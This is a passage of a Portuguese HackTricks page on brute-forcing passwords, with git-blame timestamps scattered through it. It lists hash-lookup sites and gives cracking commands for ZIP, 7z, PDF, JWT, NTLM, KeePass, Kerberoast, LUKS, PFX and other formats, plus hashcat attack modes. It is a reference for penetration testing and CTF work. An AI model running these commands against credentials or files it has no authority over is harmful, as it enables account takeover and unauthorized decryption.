2020-07-15 15:43:14 +00:00
2023-12-26 21:42:42 +00:00
* [~~http://hashtoolkit.com/reverse-hash?~~ ](http://hashtoolkit.com/reverse-hash? ) (MD5 & SHA1)
2023-10-15 21:04:17 +00:00
* [https://shuck.sh/get-shucking.php ](https://shuck.sh/get-shucking.php ) (MSCHAPv2/PPTP-VPN/NetNTLMv1 com/sem ESS/SSP e com qualquer valor de desafio)
2023-06-06 18:56:34 +00:00
* [https://www.onlinehashcrack.com/ ](https://www.onlinehashcrack.com ) (Hashes, capturas WPA2 e arquivos MSOffice, ZIP, PDF...)
2021-11-24 15:00:38 +00:00
* [https://crackstation.net/ ](https://crackstation.net ) (Hashes)
* [https://md5decrypt.net/ ](https://md5decrypt.net ) (MD5)
2023-06-06 18:56:34 +00:00
* [https://gpuhash.me/ ](https://gpuhash.me ) (Hashes e hashes de arquivos)
2021-11-24 15:00:38 +00:00
* [https://hashes.org/search.php ](https://hashes.org/search.php ) (Hashes)
* [https://www.cmd5.org/ ](https://www.cmd5.org ) (Hashes)
* [https://hashkiller.co.uk/Cracker ](https://hashkiller.co.uk/Cracker ) (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)
* [https://www.md5online.org/md5-decrypt.html ](https://www.md5online.org/md5-decrypt.html ) (MD5)
* [http://reverse-hash-lookup.online-domain-tools.com/ ](http://reverse-hash-lookup.online-domain-tools.com )
2020-07-15 15:43:14 +00:00
2024-07-18 22:06:26 +00:00
Verifique isso antes de tentar fazer brute force em um Hash.
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:52 +00:00
### ZIP
2020-07-15 15:43:14 +00:00
```bash
2023-09-03 18:16:00 +00:00
#sudo apt-get install fcrackzip
2020-07-15 15:43:14 +00:00
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
```
```bash
zip2john file.zip > zip.john
john zip.john
```
2021-02-21 10:41:35 +00:00
```bash
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
```
2024-07-18 22:06:26 +00:00
#### Ataque de zip com texto simples conhecido
2024-04-06 19:38:49 +00:00
2024-07-18 22:06:26 +00:00
Você precisa conhecer o **texto simples** (ou parte do texto simples) **de um arquivo contido dentro** do zip criptografado. Você pode verificar **nomes de arquivos e tamanhos de arquivos contidos dentro** de um zip criptografado executando: ** `7z l encrypted.zip` **\
Baixe [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0 ) da página de lançamentos.
2022-06-08 21:20:05 +00:00
```bash
# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file
./bkcrack -C < encrypted.zip > -c < plaintext.file > -P < plaintext.zip > -p < plaintext.file >
2022-09-12 15:29:22 +00:00
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
2022-06-08 21:20:05 +00:00
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
2023-09-03 18:16:00 +00:00
./bkcrack -C < encrypted.zip > -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
2022-06-08 21:20:05 +00:00
unzip unlocked.zip #User new_pwd as password
```
2024-05-06 11:08:52 +00:00
### 7z
2020-07-15 15:43:14 +00:00
```bash
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
```
```bash
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
```
2024-04-16 03:24:52 +00:00
### PDF
2020-07-15 15:43:14 +00:00
```bash
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
2022-09-12 15:29:22 +00:00
#pdf2john didn't work well, john didn't know which hash type was
2020-07-15 15:43:14 +00:00
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=< PASSWORD > --decrypt encrypted.pdf plaintext.pdf
```
2024-07-18 22:06:26 +00:00
### PDF Owner Password
2024-04-06 19:38:49 +00:00
2024-07-18 22:06:26 +00:00
Para quebrar uma senha de proprietário de PDF, verifique isto: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/ ](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/ )
2024-04-06 19:38:49 +00:00
2024-04-16 03:24:52 +00:00
### JWT
2020-07-15 15:43:14 +00:00
```bash
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John
```
2024-04-16 03:24:52 +00:00
### Quebra de NTLM
2020-07-15 15:43:14 +00:00
```bash
Format:USUARIO:ID:HASH_LM:HASH_NT:::
2021-10-05 14:53:03 +00:00
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
2020-07-15 15:43:14 +00:00
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
```
2024-04-16 03:24:52 +00:00
### Keepass
2020-07-15 15:43:14 +00:00
```bash
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
2022-09-12 15:29:22 +00:00
keepass2john -k < file-password > file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
2020-07-15 15:43:14 +00:00
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```
2024-04-16 03:24:52 +00:00
### Keberoasting
2020-07-15 15:43:14 +00:00
```bash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```
2024-07-18 22:06:26 +00:00
### Lucks image
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:52 +00:00
#### Método 1
2020-07-15 15:43:14 +00:00
2024-07-18 22:06:26 +00:00
Instalar: [https://github.com/glv2/bruteforce-luks ](https://github.com/glv2/bruteforce-luks )
2020-07-15 15:43:14 +00:00
```bash
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```
2024-04-16 03:24:52 +00:00
#### Método 2
2020-07-15 15:43:14 +00:00
```bash
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
2020-12-23 13:35:45 +00:00
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
2020-07-15 15:43:14 +00:00
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```
2024-07-18 22:06:26 +00:00
Outro tutorial de Luks BF: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1 ](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1 )
2024-01-10 07:09:16 +00:00
2024-04-16 03:24:52 +00:00
### Mysql
2020-07-15 15:43:14 +00:00
```bash
#John hash format
< USERNAME > :$mysqlna$< CHALLENGE > *< RESPONSE >
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
```
2024-04-16 03:24:52 +00:00
### Chave privada PGP/GPG
2021-09-27 14:59:59 +00:00
```bash
2022-09-12 15:29:22 +00:00
gpg2john private_pgp.key #This will generate the hash and save it in a file
2021-09-27 14:59:59 +00:00
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
```
2024-04-16 03:24:52 +00:00
### Cisco
2024-04-06 19:38:49 +00:00
2024-05-05 22:04:08 +00:00
< figure > < img src = "../.gitbook/assets/image (663).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-09-30 10:43:59 +00:00
2024-04-16 03:24:52 +00:00
### Chave Mestra DPAPI
2022-05-19 12:02:10 +00:00
2024-07-18 22:06:26 +00:00
Use [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py ](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py ) e depois john
2022-02-07 10:56:05 +00:00
2024-07-18 22:06:26 +00:00
### Coluna Protegida por Senha do Open Office
2022-02-07 10:56:05 +00:00
2024-02-06 03:39:16 +00:00
Se você tiver um arquivo xlsx com uma coluna protegida por senha, você pode desprotegê-la:
2022-02-07 10:56:05 +00:00
2024-07-18 22:06:26 +00:00
* **Faça o upload para o google drive** e a senha será removida automaticamente
* Para **remover** manualmente:
2022-02-07 10:56:05 +00:00
```bash
unzip file.xlsx
grep -R "sheetProtection" ./*
2022-04-05 22:24:52 +00:00
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
2022-02-07 10:56:05 +00:00
# Remove that line and rezip the file
zip -r file.xls .
```
2024-04-16 03:24:52 +00:00
### Certificados PFX
2022-02-07 12:08:46 +00:00
```bash
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
2022-04-05 21:52:22 +00:00
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
2022-02-07 12:08:46 +00:00
```
2024-05-05 22:04:08 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
2023-09-03 18:16:00 +00:00
\
2024-07-18 22:06:26 +00:00
Use [**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force ) para construir e **automatizar fluxos de trabalho** facilmente, impulsionados pelas **ferramentas** comunitárias **mais avançadas** do mundo.\
2024-05-06 11:08:52 +00:00
Obtenha Acesso Hoje:
2022-08-31 22:35:39 +00:00
2024-05-06 11:08:52 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}
2022-08-31 22:35:39 +00:00
2024-04-16 03:24:52 +00:00
## Ferramentas
2020-07-15 15:43:14 +00:00
2024-07-18 22:06:26 +00:00
**Exemplos de hash:** [https://openwall.info/wiki/john/sample-hashes ](https://openwall.info/wiki/john/sample-hashes )
2024-04-06 19:38:49 +00:00
2024-07-18 22:06:26 +00:00
### Hash-identifier
2020-07-15 15:43:14 +00:00
```bash
hash-identifier
> <HASH>
```
2024-07-18 22:06:26 +00:00
### Wordlists
2022-08-14 12:59:30 +00:00
* **Rockyou**
2022-09-23 17:52:05 +00:00
* [**Probable-Wordlists** ](https://github.com/berzerk0/Probable-Wordlists )
* [**Kaonashi** ](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists )
2024-02-06 03:39:16 +00:00
* [**Seclists - Passwords** ](https://github.com/danielmiessler/SecLists/tree/master/Passwords )
2022-08-14 12:59:30 +00:00
2024-07-18 22:06:26 +00:00
### **Ferramentas de Geração de Wordlists**
2022-08-14 12:59:30 +00:00
2024-07-18 22:06:26 +00:00
* [**kwprocessor** ](https://github.com/hashcat/kwprocessor )**:** Gerador avançado de teclado com caracteres base configuráveis, mapeamento de teclas e rotas.
2022-08-14 12:59:30 +00:00
```bash
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
```
2024-07-18 22:06:26 +00:00
### John mutation
2022-08-14 12:59:30 +00:00
2023-12-26 21:42:42 +00:00
Leia _**/etc/john/john.conf**_ e configure-o
2020-07-15 15:43:14 +00:00
```bash
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
```
2024-04-16 03:24:52 +00:00
### Hashcat
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:52 +00:00
#### Ataques do Hashcat
2022-08-14 12:59:30 +00:00
2023-06-06 18:56:34 +00:00
* **Ataque de lista de palavras** (`-a 0`) com regras
2022-08-14 12:59:30 +00:00
2024-07-18 22:06:26 +00:00
**Hashcat** já vem com uma **pasta contendo regras** , mas você pode encontrar [**outras regras interessantes aqui** ](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules ).
2022-08-14 12:59:30 +00:00
```
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
```
2024-07-18 22:06:26 +00:00
* **Ataque combinador de listas de palavras**
2022-08-14 12:59:30 +00:00
2024-07-18 22:06:26 +00:00
É possível **combinar 2 listas de palavras em 1** com hashcat.\
2023-06-06 18:56:34 +00:00
Se a lista 1 contiver a palavra ** "hello"** e a segunda contiver 2 linhas com as palavras ** "world"** e ** "earth"**. As palavras `helloworld` e `helloearth` serão geradas.
2022-08-14 12:59:30 +00:00
```bash
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
2022-09-12 15:29:22 +00:00
# In the previous example this will generate:
2022-09-23 17:52:05 +00:00
## hello-world!
2022-08-14 12:59:30 +00:00
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
```
2023-06-06 18:56:34 +00:00
* **Ataque de máscara** (`-a 3`)
2022-08-14 12:59:30 +00:00
```bash
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:; < =>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
2022-09-12 15:29:22 +00:00
# Mask attack declaring custom charset
2022-08-14 12:59:30 +00:00
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
2022-09-23 17:52:05 +00:00
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
2022-08-14 12:59:30 +00:00
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
```
2024-07-18 22:06:26 +00:00
* Wordlist + Mask (`-a 6`) / Mask + Wordlist (`-a 7`) ataque
2022-08-14 12:59:30 +00:00
```bash
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
```
2024-04-16 03:24:52 +00:00
#### Modos do Hashcat
2020-07-15 15:43:14 +00:00
```bash
hashcat --example-hashes | grep -B1 -A2 "NTLM"
```
2024-07-18 22:06:26 +00:00
Quebrando Hashes do Linux - arquivo /etc/shadow
2021-11-24 15:00:38 +00:00
```
2023-09-03 18:16:00 +00:00
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
2020-07-15 15:43:14 +00:00
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
```
2024-05-06 11:08:52 +00:00
Quebrando Hashes do Windows
2024-03-17 16:28:29 +00:00
```
3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems
```
2024-07-18 22:06:26 +00:00
Quebrando Hashes de Aplicações Comuns
2021-11-24 15:00:38 +00:00
```
2023-09-03 18:16:00 +00:00
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
2020-07-15 15:43:14 +00:00
10800 | SHA-384 | Raw Hash
2023-09-03 18:16:00 +00:00
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw Hash
2020-07-15 15:43:14 +00:00
```
2024-07-18 22:06:26 +00:00
{% hint style="success" %}
Aprenda e pratique Hacking AWS:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Aprenda e pratique Hacking GCP: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-18 22:06:26 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-18 22:06:26 +00:00
< summary > Support HackTricks< / summary >
2023-12-30 12:05:49 +00:00
2024-07-18 22:06:26 +00:00
* Confira os [**planos de assinatura** ](https://github.com/sponsors/carlospolop )!
* **Junte-se ao** 💬 [**grupo do Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo do telegram** ](https://t.me/peass ) ou **siga** -nos no **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repositórios do github.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-18 22:06:26 +00:00
{% endhint %}
2022-08-31 22:35:39 +00:00
2024-05-05 22:04:08 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-07-18 22:06:26 +00:00
Use [**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force ) para construir e **automatizar fluxos de trabalho** facilmente, impulsionados pelas **ferramentas comunitárias mais avançadas** do mundo.\
2024-05-06 11:08:52 +00:00
Obtenha Acesso Hoje:
2022-08-31 22:35:39 +00:00
2024-05-06 11:08:52 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}